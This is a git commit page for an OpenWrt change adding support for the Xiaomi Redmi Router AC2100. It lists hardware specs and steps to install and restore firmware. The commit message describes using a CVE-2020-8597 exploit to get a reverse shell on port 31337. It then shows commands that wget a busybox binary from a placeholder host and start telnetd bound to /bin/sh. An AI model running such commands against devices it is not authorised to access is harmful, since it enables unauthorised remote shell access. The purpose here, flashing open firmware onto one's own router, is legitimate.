diff options
author | Richard Huynh <voxlympha@gmail.com> | 2020-04-23 12:50:21 +1000 |
---|---|---|
committer | Petr Štetiar <ynezz@true.cz> | 2020-05-20 15:26:22 +0200 |
commit | f3792690c4f0567a8965d82898295b9d50c3bb7e (patch) | |
tree | e966559ec2507984b3f66cb6ca349c1f5a6a3566 /package/boot/arm-trusted-firmware-mvebu/Makefile | |
parent | c93cdf536a086deab0fa696989263a97b4d6c417 (diff) | |
download | upstream-f3792690c4f0567a8965d82898295b9d50c3bb7e.tar.gz upstream-f3792690c4f0567a8965d82898295b9d50c3bb7e.tar.bz2 upstream-f3792690c4f0567a8965d82898295b9d50c3bb7e.zip |
ramips: Add support for Xiaomi Redmi Router AC2100 (RM2100)
Specification:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN, in Amber and White
- UART: On board near ethernet, opposite side from power
- Modified u-boot
Installation:
1. Run linked exploit to get shell, startup telnet and wget the files over
2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0
Restore to stock:
1. Setup PXE and TFTP server serving stock firmware image
(See dhcp-boot option of dnsmasq)
2. Hold reset button down before powering on and wait for flashing amber led
3. Release reset button
4. Wait until status led changes from flashing amber to white
Notes:
This device has dual kernel and rootfs slots like other Xiaomi devices currently
supported (mir3g, etc.) thus, we use the second slot and overwrite the first
rootfs onwards in order to get more space.
Exploit and detailed instructions:
https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100
An implementation of CVE-2020-8597 against stock firmware version 1.0.14
This requires a computer with ethernet plugged into the wan port and an active
PPPoE session, and if successful will open a reverse shell to 192.168.31.177
on port 31337.
As this shell is somewhat unreliable and likely to be killed in a random amount
of time, it is recommended to wget a static compiled busybox binary onto the
device and start telnetd with it.
The stock telnetd and dropbear unfortunately appear inoperable.
(Disabled on release versions of stock firmware likely)
Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox
chmod a+x /tmp/busybox
/tmp/busybox telnetd -l /bin/sh
Tested-by: David Martinez <bonkilla@gmail.com>
Signed-off-by: Richard Huynh <voxlympha@gmail.com>
Diffstat (limited to 'package/boot/arm-trusted-firmware-mvebu/Makefile')
0 files changed, 0 insertions, 0 deletions